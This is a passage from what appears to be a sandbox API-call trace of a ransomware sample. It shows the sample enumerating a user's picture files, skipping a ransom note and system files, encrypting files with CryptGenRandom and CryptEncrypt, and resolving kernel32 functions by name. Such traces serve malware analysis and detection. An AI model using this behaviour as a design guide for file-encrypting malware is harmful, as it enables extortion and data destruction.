HALPmcxz\\Pictures\\ZeLlJvzMNja\\L48TW.bmp.Cbnr4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zelljvzmnja\\l48tw.bmp.cbnr4"), dwFlags=0x0) returned 1 [0086.772] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.773] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.773] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.773] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38ea0b70, ftCreationTime.dwHighDateTime=0x1d4cc41, ftLastAccessTime.dwLowDateTime=0x6cf50020, ftLastAccessTime.dwHighDateTime=0x1d4d04a, ftLastWriteTime.dwLowDateTime=0x6cf50020, ftLastWriteTime.dwHighDateTime=0x1d4d04a, nFileSizeHigh=0x0, nFileSizeLow=0x708f, dwReserved0=0x0, dwReserved1=0x0, cFileName="qlMBzUqCsIPEZTD5JZK.bmp", cAlternateFileName="QLMBZU~1.BMP")) returned 1 [0086.773] lstrcmpiW (lpString1="qlMBzUqCsIPEZTD5JZK.bmp", lpString2="DECRYPT-FILES.txt") returned 1 [0086.773] lstrcmpiW (lpString1="qlMBzUqCsIPEZTD5JZK.bmp", lpString2="autorun.inf") returned 1 [0086.773] lstrcmpiW (lpString1="qlMBzUqCsIPEZTD5JZK.bmp", lpString2="boot.ini") returned 1 [0086.773] lstrcmpiW (lpString1="qlMBzUqCsIPEZTD5JZK.bmp", lpString2="desktop.ini") returned 1 [0086.773] lstrcmpiW (lpString1="qlMBzUqCsIPEZTD5JZK.bmp", lpString2="ntuser.dat") returned 1 [0086.773] lstrcmpiW (lpString1="qlMBzUqCsIPEZTD5JZK.bmp", lpString2="iconcache.db") returned 1 [0086.773] lstrcmpiW (lpString1="qlMBzUqCsIPEZTD5JZK.bmp", lpString2="bootsect.bak") returned 1 [0086.773] lstrcmpiW (lpString1="qlMBzUqCsIPEZTD5JZK.bmp", lpString2="ntuser.dat.log") returned 1 [0086.774] lstrcmpiW (lpString1="qlMBzUqCsIPEZTD5JZK.bmp", lpString2="thumbs.db") returned -1 [0086.774] lstrcmpiW (lpString1="qlMBzUqCsIPEZTD5JZK.bmp", lpString2="Bootfont.bin") returned 1 [0086.774] lstrlenW (lpString="qlMBzUqCsIPEZTD5JZK.bmp") returned 23 [0086.774] lstrcmpiW (lpString1="bmp", lpString2="lnk") returned -1 [0086.774] lstrcmpiW (lpString1="bmp", lpString2="exe") returned -1 [0086.774] lstrcmpiW (lpString1="bmp", lpString2="sys") returned -1 [0086.774] lstrcmpiW (lpString1="bmp", lpString2="dll") returned -1 [0086.774] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\") returned 51 [0086.774] lstrlenW (lpString="qlMBzUqCsIPEZTD5JZK.bmp") returned 23 [0086.774] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\" [0086.774] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\", lpString2="qlMBzUqCsIPEZTD5JZK.bmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\qlMBzUqCsIPEZTD5JZK.bmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\qlMBzUqCsIPEZTD5JZK.bmp" [0086.774] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.774] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\qlMBzUqCsIPEZTD5JZK.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zelljvzmnja\\qlmbzuqcsipeztd5jzk.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0086.774] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=28815) returned 1 [0086.774] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0086.774] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0086.775] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0086.775] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0086.775] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0086.775] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0086.775] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0086.776] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.776] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0086.777] CloseHandle (hObject=0x42c) returned 1 [0086.777] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.777] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0086.778] CloseHandle (hObject=0x0) returned 0 [0086.778] CloseHandle (hObject=0x428) returned 1 [0086.778] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.778] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.778] GetTickCount () returned 0x114e244 [0086.778] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.778] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0086.779] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0086.779] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0086.821] lstrlenA (lpString="kernel32.dll") returned 12 [0086.821] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0086.821] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0086.821] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0086.821] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0086.821] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0086.821] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0086.821] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0086.821] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0086.821] lstrlenA (lpString="ADDATOMA") returned 8 [0086.821] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0086.821] lstrlenA (lpString="ADDATOMW") returned 8 [0086.821] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0086.821] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0086.821] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0086.821] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0086.821] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0086.821] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0086.821] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0086.821] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0086.821] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0086.822] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0086.822] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0086.822] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0086.822] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0086.822] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0086.822] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0086.822] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0086.822] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0086.822] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0086.822] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0086.822] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0086.822] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0086.822] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0086.822] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0086.822] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0086.822] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0086.822] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0086.822] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0086.822] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0086.822] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0086.822] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0086.822] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0086.822] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0086.822] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0086.822] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0086.822] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0086.822] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0086.822] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0086.822] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0086.822] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0086.822] lstrlenA (lpString="BACKUPREAD") returned 10 [0086.822] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0086.822] lstrlenA (lpString="BACKUPSEEK") returned 10 [0086.822] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0086.822] lstrlenA (lpString="BACKUPWRITE") returned 11 [0086.822] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0086.823] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0086.823] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0086.823] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0086.823] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0086.823] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0086.823] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0086.823] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0086.823] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0086.823] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0086.823] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0086.823] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0086.823] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0086.823] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0086.823] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0086.823] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0086.823] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0086.823] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0086.823] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0086.823] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0086.823] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0086.823] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0086.823] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0086.823] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0086.823] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0086.823] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0086.823] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0086.823] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0086.823] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0086.823] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0086.823] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0086.823] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0086.823] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0086.823] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0086.823] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0086.823] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0086.823] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0086.824] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0086.824] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0086.824] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0086.824] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0086.824] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0086.824] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0086.824] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0086.824] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0086.824] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0086.824] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0086.824] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0086.824] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0086.824] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0086.824] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0086.824] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0086.824] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0086.824] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0086.824] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0086.824] lstrlenA (lpString="BEEP") returned 4 [0086.824] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0086.824] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0086.824] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0086.824] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0086.824] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0086.824] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0086.824] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0086.824] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0086.824] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0086.824] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0086.824] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0086.824] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0086.824] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0086.824] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0086.824] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0086.824] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0086.825] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0086.825] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0086.825] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0086.825] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0086.825] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0086.825] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0086.825] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0086.825] lstrlenA (lpString="CANCELIO") returned 8 [0086.825] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0086.825] lstrlenA (lpString="CANCELIOEX") returned 10 [0086.825] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0086.825] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0086.825] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0086.825] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0086.825] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0086.825] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0086.825] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0086.825] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0086.825] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0086.825] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0086.825] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0086.825] lstrlenA (lpString="CHECKELEVATION") returned 14 [0086.825] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0086.825] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0086.825] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0086.825] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0086.825] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0086.825] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0086.825] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0086.825] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0086.825] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0086.825] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0086.825] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0086.825] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0086.825] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0086.826] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0086.826] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0086.826] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0086.826] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0086.826] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0086.826] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0086.826] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0086.826] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0086.826] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0086.826] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0086.826] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0086.826] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0086.826] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0086.826] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0086.826] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0086.826] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") 